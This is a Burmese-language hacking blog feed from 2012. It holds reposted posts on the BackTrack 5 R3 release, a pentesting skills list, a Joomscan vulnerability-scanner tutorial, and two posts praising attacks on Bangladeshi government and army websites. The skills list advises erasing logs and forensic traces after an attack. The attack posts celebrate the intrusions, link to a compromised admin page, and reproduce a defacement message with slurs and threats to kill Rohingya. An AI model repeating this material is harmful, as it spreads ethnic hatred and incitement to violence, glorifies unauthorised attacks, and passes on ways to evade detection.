<span style="font-size: medium;"><span style="color: red;">mmcybersecurityteam မွ ဒီပိုစ့္ကိုတိုက္ရိုက္ကူးယူ ျဖန္႕ေ၀တင္ျပျခင္းျဖစ္ပါသည္..။ </span></span></div>
shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-28615195927686818542012-08-13T22:07:00.000-07:002012-08-13T22:07:12.746-07:00BackTrack 5 R3 Released - Download Now !<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjkWee5OVqSZ8tt2pcNWCYl3hUtx9eevJ7q1FoNj3ekNaVyA-3rXEpLOkhJrq1fQfvGW2umQukkUfXniY02ap_5pmxhpgeH3mhBMX1Lz-GMlHVl4Lhjzi0KWIidi0B-lVEGxNi47SBRLI/s1600/index.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjkWee5OVqSZ8tt2pcNWCYl3hUtx9eevJ7q1FoNj3ekNaVyA-3rXEpLOkhJrq1fQfvGW2umQukkUfXniY02ap_5pmxhpgeH3mhBMX1Lz-GMlHVl4Lhjzi0KWIidi0B-lVEGxNi47SBRLI/s1600/index.jpg" /></a></div>
<br />
<br />
သတင္ေကာင္းပါးအပ္ပါတယ္...ကၽြန္ေတာ္တို႕ရဲ႕ Hacking ကိုခ်စ္ျမတ္ႏိုးသူမ်ားရဲ႕စိတ္ၾကိဳက္ျဖစ္တဲ့ BT 5 ရဲ႕ ေနာက္ဆံုး version ျဖစ္တဲ့ BackTrack 5 R3 version ဟာဒီေန႕ နံနက္ေစာေစာမွာ ထြက္ရိွခဲ့ျပီျဖစ္ပါတယ္...။ေနာက္ထပ္ထူးျခားခ်က္ကေတာ့ ယခု ဗားရွင္းတြင္ အသစ္အသစ္ ေသာ Tool ေပါင္း 60 ေက်ာ္ပါ၀င္လာခဲ့ျခင္းျဖစ္ပါတယ္...။ထိုကဲ့သို Tool ေတြထည့္ရာမွာ နာမည္ၾကီး BlackHat နဲ႕ Defcon 2012 တို႕မွ ေဆြေႏြးခ်က္မ်ားအရအတည္ျပဳရယူျပီးေတာ့ Tool အသစ္မ်ားကိုထည့္သြင္းခဲ့ျခင္းျဖစ္ပါတယ္...။အဲဒီ အသစ္အသစ္ေသာ Tool ေတြထဲမွာ နာမည္ၾကီးေနတာကေတာ့ Physical Exploitation ျဖစ္ပါတယ္...။(မွတ္ခ်က္။ ။ဘာလဲဆိုတာေတာ့ကၽြန္ေတာ္လဲသံုးၾကည့္မွသိမယ္ :D )..။ ေနာက္တစ္ခုေျပာထားတာေတာ့ ဒီဗားရွင္းဟာ သံုးတဲ့သူတိုင္းစိတ္တိိုင္းက်ေစမယ္...Tool အသစ္ေတြနဲ႕ ေ၀ေ၀ဆာဆာ ျဖစ္ေနပါလိမ့္မယ္လို႕ အားမခံခ်က္ေပးထားတယ္ဗ်...။<br />
<br />
<a href="http://www.backtrack-linux.org/backtrack/backtrack-5-r3-released/" target="_blank">Download</a> <br />
<br />
shwekoyantawshwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-82746456803242039592012-08-13T02:22:00.001-07:002012-08-13T02:22:37.481-07:00Ideal Skill Set For the Penetration Testing <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsbqb2kGIJBdWmvDNodJbqy_4HKmTk6gkyfYRwcCZjeSJqb2X-K4D6pKTEBMTQLFztRd47EhBS0baJu3DaJ7Qolvh5S3vfvveSVzOnXDEWH-qsB_gxiJqMrw3C-vMJETu-bvDJ6FeWL6U/s1600/image001-300x239.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsbqb2kGIJBdWmvDNodJbqy_4HKmTk6gkyfYRwcCZjeSJqb2X-K4D6pKTEBMTQLFztRd47EhBS0baJu3DaJ7Qolvh5S3vfvveSVzOnXDEWH-qsB_gxiJqMrw3C-vMJETu-bvDJ6FeWL6U/s1600/image001-300x239.jpg" /></a></div>
<br />
Botnet ေတြအျပီး Pen Test ဖက္လွည့္ဖို႕ ၾကိဳးစားလာမိရင္း ဟိုရွာဖတ္
ဒီရွာဖတ္နဲ႕ အဆင္ေျပမယ့္ Article ေတြ ( ကိုယ့္အတြက္ေကာ စာဖတ္သူေတြအတြက္ပါ
အဆင္ေျပမယ္ထင္တဲ့ ) ရွာျပီး ဘာသာျပန္လိုက္တာပါ <img alt=":-)" class="wp-smiley" src="http://ghostarea.net/wp-includes/images/smilies/icon_smile.gif" /> <br />
ဒီပို႕စ္ကေတာ့ Infosecinstitute က လူၾကိဳက္အမ်ားဆံုး ပို႕စ္ေတြထဲက
တစ္ပုဒ္ျဖစ္ျပီး ကၽြြန္ေတာ့္စာဖတ္သူမ်ားလည္း အေထာက္အကူျပဳမယ္ထင္လို႕
ေခါင္းစဥ္ကိုေတာင္ မျပဳျပင္ပဲ တင္ေပးလိုက္တာပါ ။<br />
<span style="color: lime;">1.Mastery of an operating system</span><br />
PenTester တစ္ေယာက္ Security Expert တစ္ေယာက္ျဖစ္ဖို႕ဆုိရင္ Operating
System ေတြအေၾကာင္းကို ေသေသခ်ာခ်ာတိတိပပ သိဖို႕လိုပါလိမ့္မယ္ ။
ေတာ္ေတာ္မ်ားမ်ားက ဒီအခ်က္ကို သတိလြတ္ေနၾကတယ္ ။ OS ေတြအေၾကာင္း (
အနည္းဆံုးေတာ့ မိမိ ကိုင္တြယ္ေနတဲ့ OS အေၾကာင္း ) ေကာင္းေကာင္း မသိ ပဲ
System Admin , Pen Tester ျဖစ္ခ်င္ေနၾကတယ္ ။ System Security Admin
သာဆိုရင္ မိမိ System ဟာ Target / Victim ျဖစ္ဖို႕ ကိုးဆယ္ရာခိုင္ႏႈန္း
ေသခ်ာေနျပီပဲ ။ ထိုနည္းတူစြာပဲ Attack လုပ္မယ္ဆိုရင္ Log File ေတြဖ်က္ဖို႕
ေနာက္ေၾကာင္းရွင္းဖို႕ ကိစၥေတြမွာ ကြိဳင္လာလိမ့္မယ္ ။<br />
<span style="color: lime;">2. Network ေတြအေၾကာင္း Network Protocol ေတြအေၾကာင္းေသခ်ာသိေအာင္ ေလ့လာပါ ။</span><br />
ဒီေနရာမွာ Good Knowledge ဆုိတာ OSI Layer ေလးေတြေလာက္ သိတာကို ဆိုလိုတာ မဟုတ္ပါ ။ TCP အ၀င္အထြက္<br />
ေတြသိရမယ္ ။ ဒါကိုလည္း TCP ဆို Transmission Control Protocol ဆိုတာေလာက္ သိရင္ရျပီ လို႕ ဆိုလိုတာမဟုတ္ဘူး ။<br />
Packet ေတြရဲ႕ Structure , ျပီးေတာ့ သူတို႕ဘယ္လိုအလုပ္လုပ္တယ္ဆိုတာ .. အေသးစိတ္ေပါ့ ( TCP နဲ႕ပတ္သတ္ျပီးေတာ့<br />
TCP/IP ဆိုတဲ့ W.Richard Stevens ေရးတဲ့ ဟာေလး ဆို အဆင္ေျပမယ္ ) ျပီးေတာ့ Routing အေၾကာင္း အေသးစိတ္ Packet<br />
ေတြ တစ္ေနရာ ကေန တစ္ေနရာကို ဘယ္လိုကူးတယ္ဆိုတဲ့အေၾကာင္း အေသးစိတ္ . DNS ေတြအလုပ္လုပ္ပံု . ARP အေၾကာင္း<br />
DHCP အေၾကာင္း ကို အေသးစိတ္သိဖုိ႕လိုမယ္ ။ Automatic IP ေတြအေၾကာင္း Plug တက္လိုက္တာနဲ႕ ဘယ္လို Address ကို<br />
Auto သတ္မွတ္တယ္ဆိုတဲ့အေၾကာင္း အျပင္ NIC က သံုးေနတဲ့ Traffic Type. ဒါေတြကို အတိအက်အေသးစိတ္သိဖို႕လိုပါလိ္မ့္မယ္<span id="more-1256"></span><br />
<span style="color: lime;">3.Basic Script ေလးေတြေလ့လာပါ ။</span><br />
vb script သို႕မဟုတ္ Batch file script ေတြက စရင္ အဆင္ေျပပါ့မယ္ ။ Batch file Programming ဆိုတဲ့ စာအုပ္က<br />
အေထာက္အကူျပဳပါလိမ့္မယ္ ။ အနည္းဆံုး အေျခခံအေသးစား Software ေလးေတြေရးႏဳိင္ေလာက္တဲ့ အထိ Programming<br />
Knowledge လိုအပ္ပါလိမ့္မယ္ ။<br />
<span style="color: lime;">4.သင္ကိုယ္တိုင္ Firewall တစ္ခုျဖစ္ေနပါေစ</span><br />
သေဘာကေတာ့ မိမိကိုယ္ကိုလည္း ကာကြယ္ႏုိင္ရပါ့မယ္ ။ Defenses ေတြနဲ႕ပတ္သတ္ျပီး သိနားလည္ေအာင္လုပ္ပါ ။<br />
ေစ်းေပါတဲ့ Router အေဟာင္းေလးတစ္ခုကို သံုးျပီး IP Spoofing လိုမ်ိဳး Simple Techniques ေလးေတြ စမ္းျပီး ဘယ္လို ကာကြယ္<br />
ရမယ္ ဆိုတာလည္း ေလ့လာသင့္ပါတယ္။ လက္ေတြ႕စမ္းသပ္မွ တကယ္တတ္မယ့္ကိစၥမ်ိဳးေတြပါ ။<br />
<span style="color: lime;">5.Froensiscs နဲ႕ပတ္သတ္ျပီး နည္းနည္းေတာ့ သိသင့္ပါတယ္ ။</span><br />
ဒါမွသာ ကိုယ့္ေျခရာလက္ရာေတြကို ဖ်က္တဲ့ေနရာမွာ အသံုး၀င္ႏိုင္မွာပါ ။ ဒါကလည္း အေရးပါတဲ့ ေနရာတစ္ခုမွာ ပါရွိပါတယ္<br />
<span style="color: lime;">6.Programming Language တစ္ခုေတာ့ကၽြြမ္းက်င္အဆင့္မွာရွိပါေစ ။ တစ္ခုထက္ပိုႏုိင္ရင္ အေကာင္းဆံုးေပါ့ .။</span><br />
ဒီေနရာမွာ ေျပာစရာနည္းနည္းရွိတယ္ဗ် ။ HOW TO PROGRAM IN C တို႕ ဘာတို႕ အစရွိတဲ့ ေခါင္းစဥ္ေတြနဲ႕ စာအုပ္ေတြကို သြားမဖတ္နဲ႕ ။<br />
အဓိက Concept ကေလးေတြ နားလည္ျပီးေသခ်ာလား ဒါဆုိ Program တစ္ခု စေရးေတာ့
ဥပမာ . port scanner ေပါ့ ဒါမ်ိဳးဆို nmap ေဒါင္း သူ႕ Source Code<br />
ဖတ္ အဲ့ဒါမ်ိဳးရေအာင္ေရး မသိရင္ ဖိုရမ္ေတြကို လိုက္ေမး . ဒါ အေကာင္းဆံုးနည္းပဲ ကၽြြန္ေတာ့္ကို ယံု<br />
<span style="color: lime;">7.Note တစ္ခုထားပါ</span><br />
ဒါအေရးအၾကီးဆံုးလို႕ ေျပာရပါလိမ့္မယ္ ဒီေန႕ ကုိယ္ဘာဖတ္တယ္ ကိုယ္ဘာသိတယ္ ဘာေတြလုပ္တယ္ ဆိုတာကို<br />
Refences တစ္ခု Note တစ္ခုလို ထားပါ ။ ဒါဆို ကိုယ့္အခ်ိန္ေတြကို ကိုယ္ဘယ္လိုသံုးေနရတယ္ဆိုတာသိသလို ေလ့လာမႈလည္း<br />
တုိးတက္ပါလိမ့္မယ္<br />
<span style="color: lime;">8.DataBase ေတြအေၾကာင္း နည္းနည္းေတာ့သိဖို႕လိုပါလိမ့္မယ္။</span><br />
သူတို႕ဘယ္လိုအလုပ္လုပ္တယ္ဆိုတဲ့အေၾကာင္းလည္း သိဖို႕လိုပါတယ္ ။ mysql ကို ေဒါင္းလိုက္ပါျပီ ျပီးရင္ Database တစ္ခု<br />
ဘယ္လိုေဆာက္တယ္ဆိုတဲ့အေၾကာင္းနဲ႕ပတ္သတ္ျပီး Tutorial ေလးေတြရွာဖတ္ပါ ။ ကၽြြမ္းက်င္အဆင့္ျဖစ္ရမယ္ လို႕မဆိုလိုပါဘူး ။<br />
နည္းနည္းပါးပါးေတာ့ သိဖုိ႕လိုပါတယ္ ။<br />
<span style="color: lime;">9.တစ္ေယာက္ထဲ အလုပ္မလုပ္ပါနဲ႕ ။</span><br />
ကိုယ့္ထက္ပိုသိတဲ့လူေတြ ကိုယ့္ေလာက္မသိတဲ့လူေတြ အပါအ၀င္ Pentesting ကို ေလ့လာေနသူတိုင္းကို မိမိအသိပညာေတြ<br />
မွ်ေ၀ပါ ။<br />
<br />
post by negative thunder<br />
copy from ghostarea.net shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-56417018803428158612012-08-13T02:09:00.002-07:002012-08-13T02:09:27.527-07:00Great work !!!! Myanmar cyber counter ddos team (MCCDT)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjctL4dEsvXxUqaoTyOibMD_N1PUj_8Ublaf4TKdusoGPEjaeC0f_SDr8ulMiNRilQCQ9tWYRue4DWWIlHXHZPZy-iOjDv3oJaStMe4qp9BEbhy0As6ruFr770dA3dWNwjzKIdCnWdQreA/s1600/index.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjctL4dEsvXxUqaoTyOibMD_N1PUj_8Ublaf4TKdusoGPEjaeC0f_SDr8ulMiNRilQCQ9tWYRue4DWWIlHXHZPZy-iOjDv3oJaStMe4qp9BEbhy0As6ruFr770dA3dWNwjzKIdCnWdQreA/s400/index.jpg" width="400" /></a></div>
<br />
<br />
ျမန္မာျပည္အားမၾကာေသးမွီကတိုက္ခိုက္ခဲ့ေသာ ဘဂၤလီကုလားမ်ား၏ web site ျဖစ္ေသာ www.army.mil.bd ႏွင့္ www.bangladesh.gov.bd အားျမန္မာႏိုင္ငံမွ black hacker မ်ားႏွင့္ အျခားေသာ hacker အဖြဲ႕အစည္းမ်ားပူးေပါင္းကာတိုက္ခိုက္ခဲ့ၾကၿပီး. ၄င္းဆိုက္မ်ားကိုျပန္လည္ေစာင့္ၾကည့္ဆက္လက္ တိုက္ ခိုက္မည္ျဖစ္ေၾကာင္း MCST မွ ၄င္း Opreation တြင္ပါ၀င္ခဲ့ၿပီး ျမန္မာႏိုင္ငံရွိ အားလံုးေသာ hacker မ်ား၏ ညီညႊတ္မႈကို ယခုပို႕စ္ႏွင့္ ဂုဏ္ျပဳပါေၾကာင္း.........<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ9-CC0BFuia_a8swPLvkWE3Z9FFFabcuFDGFx0lyXV8LvOP29j4geFAgJujhzsH73pKS-VgeI2yM2rem2NoOV7ABDAfm0cNwg1fz0DfOqqecCDrTKmN1DtylD3cJJbstOjnGMKX3L7y4/s1600/bd.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ9-CC0BFuia_a8swPLvkWE3Z9FFFabcuFDGFx0lyXV8LvOP29j4geFAgJujhzsH73pKS-VgeI2yM2rem2NoOV7ABDAfm0cNwg1fz0DfOqqecCDrTKmN1DtylD3cJJbstOjnGMKX3L7y4/s400/bd.jpg" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxcAeMOB1Fpks9pNKZOyjueSdzlTg08TOXIY10kLmvlrr_rSXUDwOGZEaPTdYI4ZCTdvuON2DyBfu-DrI44q0YD5kfdpiS6x_8dN4eiSkjIRoJPvs3AKhz7SM8zDsrVk5qoLPHPAxnLNw/s1600/bd5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxcAeMOB1Fpks9pNKZOyjueSdzlTg08TOXIY10kLmvlrr_rSXUDwOGZEaPTdYI4ZCTdvuON2DyBfu-DrI44q0YD5kfdpiS6x_8dN4eiSkjIRoJPvs3AKhz7SM8zDsrVk5qoLPHPAxnLNw/s400/bd5.jpg" width="400" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8YvjXmwnBPEI-ZUg4i4lRUwmPpdS14UZpqa_To0GT6P3WYYAWbE7e-1X8xm614wwQgVuliPY-iTLzYzZgpGyhrlzAAZS8o4jxiXaX0WDmQ6k-hEdq1OhA0b7BAtR7Ir_hpmta0p3vAL0/s1600/bd3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8YvjXmwnBPEI-ZUg4i4lRUwmPpdS14UZpqa_To0GT6P3WYYAWbE7e-1X8xm614wwQgVuliPY-iTLzYzZgpGyhrlzAAZS8o4jxiXaX0WDmQ6k-hEdq1OhA0b7BAtR7Ir_hpmta0p3vAL0/s400/bd3.jpg" width="400" /></a></div>
<br />
<div style="text-align: center;">
<a href="http://www.army.mil.bdy/">http://www.army.mil.bdy</a></div>
<div style="text-align: center;">
<a href="http://www.bangladesh.gov.bd/">http://www.bangladesh.gov.bd</a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikRpLZC3xMQZbkqLVGJ0MlPwArMCIhhguW5XLRXRgZjpxorKWteHqTediSB8xjiIIKAJojzC20GGGpWwI7clFi9yjp-jK5QBeX0EmRdlb-a_rPLWhuu4LOUBjvMPHL1hN7HsIlaRhknXw/s1600/bd2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikRpLZC3xMQZbkqLVGJ0MlPwArMCIhhguW5XLRXRgZjpxorKWteHqTediSB8xjiIIKAJojzC20GGGpWwI7clFi9yjp-jK5QBeX0EmRdlb-a_rPLWhuu4LOUBjvMPHL1hN7HsIlaRhknXw/s400/bd2.jpg" width="400" /></a></div>
<br />
<br />
Leader of Those Operation .....Thankz Great MCCDT<br />
<a href="http://www.facebook.com/groups/myanmarcybercounterddosteam/">http://www.facebook.com/groups/myanmarcybercounterddosteam/</a><br />
<br />
<br />
ref:/copy:///<a href="http://www.mmcybersecurityteam.net/" target="post">MyanmarCyberSecurityTe@m</a>shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-39728625291484735512012-08-13T01:38:00.000-07:002012-08-13T01:38:04.244-07:00How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux? <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpj9G1kh9GBMI-9zLPXqROi_BVLlgagQL4msPyqbLhOjJ1PfCzO0_XtdFu48MmsKf1In6lj6ikm_3zvEfhBsfUY5r2TVhIeIUfCNDv6F6nEI9A8UkOcIcCKznsKF7mu_pmHGnrrvmBt8Q/s1600/index.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpj9G1kh9GBMI-9zLPXqROi_BVLlgagQL4msPyqbLhOjJ1PfCzO0_XtdFu48MmsKf1In6lj6ikm_3zvEfhBsfUY5r2TVhIeIUfCNDv6F6nEI9A8UkOcIcCKznsKF7mu_pmHGnrrvmBt8Q/s200/index.jpg" width="200" /></a></div>
<br />
<br />
တစ္ကယ္ေတာ့ Jommla scan သံုးတယ္ဆိုတာ Hacking လုပ္တယ္လို႕မဆိုလိုႏိုင္ဘူးဗ်...။ယိုေပါက္ vulnerability ေတြကို Jommla CMS ထဲမွာေပါက္မေပါက္စစ္ေပးတာဗ်..ေနာက္ဆံုးထြက္ Updated version ဆိုရင္ Vulnerabilities 550 ေလာက္ကိုစံုစမ္းေထာက္လွမ္း ေပးႏိုင္တယ္..။ဒါကိုဘယ္လိုအသံုးျပဳရမလဲဆိုတာ ကိုကၽြန္ေတာ္တင္ျပေရးသားေပးပါ့မယ္...။ Jommla scan မရိွလွ်င္ jommla scan ကိုေအာက္ပါေနရာတြင္ေဒါင္းလုပ္ဆြဲလိုက္ပါ...။<br />
<br />
<a href="http://web-center.si/joomscan/joomscan.tar.gz">http://web-center.si/joomscan/joomscan.tar.gz</a><br />
<br />
ေနာက္တစ္ဆင့္အေနနဲ႕ကေတာ့ ေအာက္ေဖာ္ျပပါ directory အတိုင္းထားေပးလိုက္ပါ...။<br />
<br />
/pentest/web/scanners/joomscan/<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheGJgG1lI1T7deEF0Nnw030YbW9APAAZAaqw28u86qFH0rLiMI8h3KGIc_BFJXMhaBuGZkXnoAnz0PCPTWJR3I458G9FUoxoXxkntXGMzherwgWKE2viwD8kxMSJs8e1jd3FYY-FqBHsw/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheGJgG1lI1T7deEF0Nnw030YbW9APAAZAaqw28u86qFH0rLiMI8h3KGIc_BFJXMhaBuGZkXnoAnz0PCPTWJR3I458G9FUoxoXxkntXGMzherwgWKE2viwD8kxMSJs8e1jd3FYY-FqBHsw/s400/2.jpg" width="400" /></a></div>
<br />
<br />
ေနာက္တစ္ဆင့္အေနနဲ႕ကေတာ့ Joomscan ကို set permission လုပ္ဖို႕လိုပါေသးတယ္..ဘယ္လိုလုပ္ရမလဲဆိုရင ္Terminal ထဲကိုသြာျပီးေအာက္ပါ commands မ်ားကိုရိုက္ထည့္လိုက္ပါ..။<br />
<br />
CHMOD 0777 joomscan.pl<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRIxWz5qxfhCrMJMjPfScVHl52r1K4MF_830_wWiTpnEG2qn3dWTUPUWJ9toCbENmhFAc3aPoi9yLaCrAX6QeEI8AkKiwfel-3GUQCMk5U71DG11Oai1-k1UNxV2cjU39v-Pgyc45M_wc/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRIxWz5qxfhCrMJMjPfScVHl52r1K4MF_830_wWiTpnEG2qn3dWTUPUWJ9toCbENmhFAc3aPoi9yLaCrAX6QeEI8AkKiwfel-3GUQCMk5U71DG11Oai1-k1UNxV2cjU39v-Pgyc45M_wc/s640/4.jpg" width="640" /></a></div>
<br />
<br />
ေနာက္တစ္ဆင့္ကေတာ့ ေနာက္ဆံုးထြက္ version ကို update လုပ္ရမယ္..အဲလိုလုပ္မယ္ဆိုရင္ Terminal ထဲကပဲ ၀င္ျပီးေတာ့ ေအာက္ပါ commands ေတြကိုရိုက္ထည့္လိုက္ပါ...။<br />
./joomscan.pl update<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRYaZp2RpBOK6XlXNaE-NGGFCNN8lf9rI4CaVx-jAqgZ5E3IPRMcs5s7gSSDze5mtOgIdKBbOpZKfSIYmbU3nVAYaG_aDoyyCEk-IqIFYzwJQxoVcQzNDHmPc6jx7ZqUO3KSDbuF1wexA/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRYaZp2RpBOK6XlXNaE-NGGFCNN8lf9rI4CaVx-jAqgZ5E3IPRMcs5s7gSSDze5mtOgIdKBbOpZKfSIYmbU3nVAYaG_aDoyyCEk-IqIFYzwJQxoVcQzNDHmPc6jx7ZqUO3KSDbuF1wexA/s640/7.jpg" width="640" /></a></div>
<br />
<br />
ဒါဆိုရင္အားလံုး OK ျပီ..စလို႕ရျပီ...ကၽြန္ေတာ္တို႕ Jommla scan ကိုသံုးျပီးေတာ့ ယိုေပါက္ေတြကို စတင္ ေထာက္လွမ္းႏိုင္ပါျပီ ထိုေဖာက္၀င္ေရာက္ျခင္းအတြက္ကေတာ့ ကိုယ္ရဲ႕ Hacking scale နဲ႕ဆိုင္ပါတယ္....။ Terminal ထဲကိုသြားျပီးေတာ့ေအာက္ပါ command ကိုသံုးျပီစတင္ စစ္ေဆးႏိုင္ပါျပီ...။<br />
<br />
./joomscan.pl -u www.YourJoomlasite.com.. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD5qwpOM4TzX3cNKjooFJfCu72KpBoKuVZH11IisA3SEHc-aWvyb6wfsQ7ZRg6CjHl2Gacj45QIYeNs3jznI1g-jjza5mU8PCq5zOl-S8k3dqRE7aXX5IwUa9EsTmyuZAzAI_es_cWHyE/s1600/8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD5qwpOM4TzX3cNKjooFJfCu72KpBoKuVZH11IisA3SEHc-aWvyb6wfsQ7ZRg6CjHl2Gacj45QIYeNs3jznI1g-jjza5mU8PCq5zOl-S8k3dqRE7aXX5IwUa9EsTmyuZAzAI_es_cWHyE/s640/8.jpg" width="640" /></a></div>
<br />
<br />
www.YourJoomlasite.com ဆိုတဲ့ေနရာမွာ သင့္ Terget ဆိုက္ကိုထည့္ပါ...။ျပီးရင္ စစ္ေဆးေနတဲ့အခ်ိန္ကို ခဏေစာင့္ပါ....။ယိုေပါက္ရိွပါက ေဖာ္ျပေပးပါလိမ့္မယ္...။လံုျခံဳေရးအားေကာင္းတဲ့ ဆိုက္မ်ားအတြက္ အာမ မခံပါ...။<br />
<br />
Shwekoyantaw....shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-7515119836227211952012-08-06T20:48:00.002-07:002012-08-06T20:48:42.203-07:00BD Site is hacked by Chinese Hackers<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMde64fRTWJiEPYCfJErK3C8FomMHbuTo6ZGB5ARHiGq4ccXBlKxXVYewkbnDiR8RuBxnnktRR946GekuhDLfoRKjIq0j5yf1ISfJFQIjDDNbuZ3m6S5ESigNnacbRCH-VCAnu205uFaU/s1600/untitled.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMde64fRTWJiEPYCfJErK3C8FomMHbuTo6ZGB5ARHiGq4ccXBlKxXVYewkbnDiR8RuBxnnktRR946GekuhDLfoRKjIq0j5yf1ISfJFQIjDDNbuZ3m6S5ESigNnacbRCH-VCAnu205uFaU/s640/untitled.jpg" width="640" /></a></div>
<br />
<br />
သတင္းအခ်က္အလက္တစ္ခုကိုကိုမေန႕ကရရိွခဲ့တာပါ...သိရတာေတာင္ေနာက္က်ေနျပီလို႕ထင္ပါတယ္...။ Chinese hacker အဖြဲ႕ တစ္ဖဲြ႕ဟာ BD ဆိုက္တစ္ခုကို Hack ထိုးေဖါက္၀င္ေရာက္ခဲ့ျပီးေတာ့ ရိုဟင္ဂါကုလားမ်ား အေရးမွာ ပါ၀င္ေဆာင္ရြက္သြားခဲ့ပါတယ္...သူတို႕ရဲ႕ Defacing Page မွာလဲေအာက္ပါ အတိုင္း Massage ေပးခဲ့ပါတယ္...။<br />
<br />
<div style="color: red;">
-- Message -- <br />:::!!!Stop killing buddhist people & burning villages in RAKHINE state including Myanmar-Bangladesh broder.!!!:::<br /><br />We will not stop attacking u -motherfucker Bangladesh Rohinjas!<br />Chinese Hackers + Myanmar Hackers + Indian Hackers are comming to fuck Bangladesh lammers!<br />Stop Terrorist in Rakhine.<br />Where r u now fucking pigs..<br />We r searching u!<br />We will kill all ur Rohinja Religions Soon!<br />We Love Myanmar!</div>
<br />
ေနာက္ျပီးေတာ့ေအာက္ပါအတိုင္း လဲေရးသားထားပါေသးတယ္..။<br />
<br />
<div style="color: lime;">
Greetz : Myanmar Cyber Army, Blink Hacker Group, Myanmar Hackers Uniteam , Chinese Cyber Army , Indishell ,Indian Cyber Army </div>
<br />
တိုက္ခိုက္ခံရတဲ့ BD အစိုးရဆိုက္တစ္ခုျဖစ္ပါတယ္..။ေအာက္ေဖာ္ျပပါလင့္အတိုင္းသြားႏိုင္ပါတယ္...။<br />
<a href="http://bhb.gov.bd/adminn/">http://bhb.gov.bd/adminn/</a>shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com